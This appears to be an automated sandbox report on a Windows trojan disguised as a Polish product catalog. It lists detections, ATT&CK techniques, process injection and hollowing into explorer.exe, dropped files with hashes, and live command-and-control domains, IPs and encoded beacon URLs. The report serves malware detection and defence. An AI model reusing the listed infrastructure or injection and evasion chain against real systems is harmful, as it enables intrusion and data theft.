          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Application Shimming1Process Injection612Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Process Injection612LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery251SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 515499 Sample: nowy przyk#U0142adowy katalog.exe Startdate: 04/11/2021 Architecture: WINDOWS Score: 100 32 www.sddn13.xyz 2->32 34 sddn13.xyz 2->34 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 9 other signatures 2->58 11 nowy przyk#U0142adowy katalog.exe 17 2->11         started        signatures3 process4 dnsIp5 42 192.168.2.1 unknown unknown 11->42 30 C:\Users\user\AppData\Local\...\rarelsbsy.dll, PE32 11->30 dropped 72 Injects a PE file into a foreign processes 11->72 16 nowy przyk#U0142adowy katalog.exe 11->16         started        file6 signatures7 process8 signatures9 44 Modifies the context of a thread in another process (thread injection) 16->44 46 Maps a DLL or memory area into another process 16->46 48 Sample uses process hollowing technique 16->48 50 Queues an APC in another process (thread injection) 16->50 19 explorer.exe 16->19 injected process10 dnsIp11 36 harada-insatsu.com 153.127.214.206, 49773, 80 SAKURA-ASAKURAInternetIncJP Japan 19->36 38 www.iccsukltd.com 217.160.0.33, 49770, 80 ONEANDONE-ASBrauerstrasse48DE Germany 19->38 40 17 other IPs or domains 19->40 60 System process connects to network (likely due to code injection or exploit) 19->60 62 Performs DNS queries to domains with low reputation 19->62 23 cmstp.exe 19->23         started        signatures12 process13 signatures14 64 Self deletion via cmd delete 23->64 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 70 Tries to detect virtualization through RDTSC time measurements 23->70 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nowy przyk#U0142adowy katalog.exe30%ReversingLabsWin32.Backdoor.Zapchast
          nowy przyk#U0142adowy katalog.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll14%ReversingLabsWin32.Backdoor.Zapchast

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          11.2.cmstp.exe.4b5796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          11.2.cmstp.exe.3bbc28.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          harada-insatsu.com0%VirustotalBrowse
          bezhantrading.com6%VirustotalBrowse
          www.iccsukltd.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          www.bezhantrading.com/wtcv/0%Avira URL Cloudsafe
          http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw==0%Avira URL Cloudsafe
          http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg==0%Avira URL Cloudsafe
          http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA==0%Avira URL Cloudsafe
          http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          harada-insatsu.com
          		153.127.214.206
          		truetrueunknown
          bezhantrading.com
          		104.248.163.187
          		truetrueunknown
          www.iccsukltd.com
          		217.160.0.33
          		truetrueunknown
          td-balancer-euw2-6-109.wixdns.net
          		35.246.6.109
          		truefalse
            		unknown
            americanvisionvinyl.com
            		34.102.136.180
            		truefalse
              		unknown
              www.affiliatemarketingproducts.xyz
              		172.67.184.156
              		truetrue
                		unknown
                sddn13.xyz
                		50.118.182.205
                		truetrue
                  		unknown
                  worryterrible.space
                  		34.102.136.180
                  		truefalse
                    		unknown
                    www.alles-abgedeckt.com
                    		46.38.243.234
                    		truetrue
                      		unknown
                      leads-mania.club
                      		138.68.74.116
                      		truetrue
                        		unknown
                        www.tankomixing.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.sddn13.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.leads-mania.club
                            		unknown
                            		unknowntrue
                              		unknown
                              www.worryterrible.space
                              		unknown
                              		unknowntrue
                                		unknown
                                www.bezhantrading.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.americanvisionvinyl.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.dempseynutrition.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.harada-insatsu.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.bezhantrading.com/wtcv/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_Errornowy przyk#U0142adowy katalog.exefalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrornowy przyk#U0142adowy katalog.exefalse
                                              		high
                                              http://browsehappy.com/cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmpfalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.248.163.187
                                                		bezhantrading.comUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                35.246.6.109
                                                		td-balancer-euw2-6-109.wixdns.netUnited States
                                                		15169GOOGLEUSfalse
                                                153.127.214.206
                                                		harada-insatsu.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                138.68.74.116
                                                		leads-mania.clubUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                34.102.136.180
                                                		americanvisionvinyl.comUnited States
                                                		15169GOOGLEUSfalse
                                                172.67.184.156
                                                		www.affiliatemarketingproducts.xyzUnited States
                                                		13335CLOUDFLARENETUStrue
                                                217.160.0.33
                                                		www.iccsukltd.comGermany
                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                46.38.243.234
                                                		www.alles-abgedeckt.comGermany
                                                		197540NETCUP-ASnetcupGmbHDEtrue

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:515499
                                                Start date:04.11.2021
                                                Start time:11:46:58
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:nowy przyk#U0142adowy katalog.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/9
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 31.3% (good quality ratio 28.4%)
                                                • Quality average: 73.6%
                                                • Quality standard deviation: 31.7%
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.49.150.241, 51.11.168.232
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, settingsfd-geo.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                104.248.163.187#Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?jXF0i=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&E48PcH=s4SDBdZH
                                                EQ034989.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?p8bLu=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8JJxJTHP/B&3fyTKn=C2MDbjTp
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • www.bezhantrading.com/wtcv/?8p=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&6lQL=e48to28xCrLPt0sP
                                                153.127.214.206EQ034989.exeGet hashmaliciousBrowse
                                                • www.harada-insatsu.com/wtcv/?p8bLu=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qws3oxF3Klxqa&3fyTKn=C2MDbjTp
                                                172.67.184.156EQ034989.exeGet hashmaliciousBrowse
                                                • www.affiliatemarketingproducts.xyz/wtcv/?p8bLu=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v3fb5eH+BFz&3fyTKn=C2MDbjTp
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • www.affiliatemarketingproducts.xyz/wtcv/?8p=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v31EJuH6DNz&6lQL=e48to28xCrLPt0sP
                                                217.160.0.33EQ034989.exeGet hashmaliciousBrowse
                                                • www.iccsukltd.com/wtcv/?p8bLu=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n/VdZfFb4jod&3fyTKn=C2MDbjTp

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                www.iccsukltd.comEQ034989.exeGet hashmaliciousBrowse
                                                • 217.160.0.33
                                                www.affiliatemarketingproducts.xyzEQ034989.exeGet hashmaliciousBrowse
                                                • 172.67.184.156
                                                cat#U00e1logo de productos2021.exeGet hashmaliciousBrowse
                                                • 172.67.184.156

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                SAKURA-ASAKURAInternetIncJPiSBX2z1os7.exeGet hashmaliciousBrowse
                                                • 153.126.211.112
                                                EQ034989.exeGet hashmaliciousBrowse
                                                • 153.127.214.206
                                                Port_UETQYDYA_99381,pdf.exeGet hashmaliciousBrowse
                                                • 133.242.249.12
                                                GF2QHRMI1tGet hashmaliciousBrowse
                                                • 153.127.220.234
                                                mirai.x86Get hashmaliciousBrowse
                                                • 153.120.181.224
                                                10xR6hubANGet hashmaliciousBrowse
                                                • 133.125.49.243
                                                1cG7fOkPjS.exeGet hashmaliciousBrowse
                                                • 153.127.214.165
                                                index_2021-09-21-20_06Get hashmaliciousBrowse
                                                • 153.120.48.218
                                                8U5snojV8p.exeGet hashmaliciousBrowse
                                                • 153.126.210.205
                                                W53ieNnm24Get hashmaliciousBrowse
                                                • 133.242.220.190
                                                LhMC14F4r6Get hashmaliciousBrowse
                                                • 133.242.202.122
                                                WR5MZql7vpGet hashmaliciousBrowse
                                                • 153.125.128.242
                                                ivMI3veipP.exeGet hashmaliciousBrowse
                                                • 153.127.71.68
                                                4dIxGwjniIGet hashmaliciousBrowse
                                                • 153.121.193.216
                                                8gQIIxr1sNGet hashmaliciousBrowse
                                                • 133.125.13.8
                                                o3ZUDIEL1vGet hashmaliciousBrowse
                                                • 153.127.220.238
                                                xwKdahKPn8.exeGet hashmaliciousBrowse
                                                • 153.126.211.112
                                                395d57a0_by_Libranalysis.exeGet hashmaliciousBrowse
                                                • 153.126.165.175
                                                QUOTE B1020363.PDF.exeGet hashmaliciousBrowse
                                                • 133.242.249.176
                                                TION.pdf.exeGet hashmaliciousBrowse
                                                • 133.242.249.176
                                                DIGITALOCEAN-ASNUSh3SFZEdlT0.dllGet hashmaliciousBrowse
                                                • 165.227.90.171
                                                61Wq3BOwiA.exeGet hashmaliciousBrowse
                                                • 188.166.46.127
                                                gXswKQATrt.dllGet hashmaliciousBrowse
                                                • 64.225.74.183
                                                #Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exeGet hashmaliciousBrowse
                                                • 104.248.163.187
                                                1oT4BWF7GlGet hashmaliciousBrowse
                                                • 206.189.84.209
                                                iSBX2z1os7.exeGet hashmaliciousBrowse
                                                • 165.227.252.190
                                                5FjM13QB8F.exeGet hashmaliciousBrowse
                                                • 46.101.121.244
                                                sora.x86Get hashmaliciousBrowse
                                                • 157.230.1.123
                                                fe0WPoEanmGet hashmaliciousBrowse
                                                • 206.189.51.168
                                                Hilix.armGet hashmaliciousBrowse
                                                • 45.55.195.228
                                                wt5i2fAcF0Get hashmaliciousBrowse
                                                • 167.99.122.255
                                                uohdbohpYbGet hashmaliciousBrowse
                                                • 139.59.170.186
                                                jygLuGmfJ2.exeGet hashmaliciousBrowse
                                                • 157.230.28.192
                                                rzMvWQOGAE.exeGet hashmaliciousBrowse
                                                • 165.22.84.147
                                                JSUAd0NPag.exeGet hashmaliciousBrowse
                                                • 157.230.28.192
                                                gqTrv5VEem.exeGet hashmaliciousBrowse
                                                • 159.89.128.13
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.4727.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.31095.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.28634.dllGet hashmaliciousBrowse
                                                • 104.248.155.133
                                                SecuriteInfo.com.Suspicious.Win32.Save.a.12010.dllGet hashmaliciousBrowse
                                                • 104.248.155.133

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\hx6dizitwtz0f0aat
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):215803
                                                Entropy (8bit):7.994628213154947
                                                Encrypted:true
                                                SSDEEP:6144:1JIHtqEX3rWyncHSnlF1rYZYlz8gT6t+jGR:rwtbFncHc1cES+jGR
                                                MD5:61C9526BC0572C9F55C5C8A52AA67AC4
                                                SHA1:AAF907310F5A183328EC227BF2906F27574C55AB
                                                SHA-256:07AD9970509EAE7E01E04D18A115D789DF7670118F0A987F8A83270C42B6497A
                                                SHA-512:5542F3A7D19984BBF21940E64BC0C37D3ECE44942D7BECAD81F3F5E4E9180762E937A1AD3DB92EFF15F2440A0E65C09458B7D4397C2E77400E78FA1F39C205F6
                                                Malicious:false
                                                Reputation:low
                                                Preview: .'........|.....9a.v....^..]l.q.;/E=@W%.....-.......r).....[.WjN...YYt..V-..M.w.x...3.R....v_.7.....Y.k`.J..&..?..p..zge...'7x.t.v*M.g!.@,..Z..`..W8...I"4..A"....1...u.aQ{{#a...-"Z.......0.0.D.....RL.3..w39R......9.c.D.X.d.m.W.tdK.:...PR.JY...4:.qB...............xaxF...Q@Hnl.q.1/E.@W%...n.-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T....?..i.#a._.v".yG.\.V.0.0.D...X......s.........9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d.=VW.tlK.4....R..Y...4:..B.......j.......xaaF...G@Hll.q.;/E=@W%.....-.......r).....[.;`..p..."Gt..kfI33..n..~...]W.9.......]...9...... j.5.zge.....!)K;sE...53 Z&%.....;.M1.....x.$......T.....aQ{{#a.-".CG.\...0.0.D...X......w..R......9..nD.J.d
                                                C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):88064
                                                Entropy (8bit):6.428072489806541
                                                Encrypted:false
                                                SSDEEP:1536:coflsP2XNvIZy4K+PBtk7iHyX3SWzwQ9cIbUfs44UVxY2Qz:coOPkvLz+vk7Z+VxI
                                                MD5:CC4DEBEED38EA20DB5A0D2AFA03EFBEA
                                                SHA1:873E13909531B81E8B1DBDFBB8BC2AE317F73563
                                                SHA-256:6E7DC09D3A59CC7391C009BD8F8A70360CEBAFE87E817E44CD359A935DBF2617
                                                SHA-512:994E3BBB97B2B17C9A3A1DECBDB6FCEEBCA48F0384C85D568261736B42F3FF716AFA9A94511BEF5A4A2A1975651FE4F007EEC93C338381F596B47C1122658236
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 14%
                                                Reputation:low
                                                Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...P..a...........!................aG..............................................................................,2..L...x4......................................................................h...H...........(8...............................text............................... ..`.rdata..dX.......Z..................@..@.data...$E...P...$...2..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.512989604965828
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:nowy przyk#U0142adowy katalog.exe
                                                File size:422298
                                                MD5:cbe0e49106fad96b2c1c155ce5b22abd
                                                SHA1:25a9a38c80446b631fc1de30440caba41ff8ec74
                                                SHA256:a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
                                                SHA512:013931e807edc454697dab78f81c54a3c1433970916ae2ca91dee03e03a04d1ae19b32eccd05fd44c5492a3b6c0c5080aeaaaba8329c5ca2b3cc39cb2c1c5f67
                                                SSDEEP:6144:68LxBzme9UeFrAmvGfHHolKxTcE0RAF1r1qzXRgT6t+jZadV1ACLSDBQqK07:c3eFrAmv1lQApm1wz2S+jZyr8K07
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                                File Icon

                                                Icon Hash:70c8d0e0ccd4f0d0

                                                Static PE Info

                                                General

                                                Entrypoint:0x40312a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
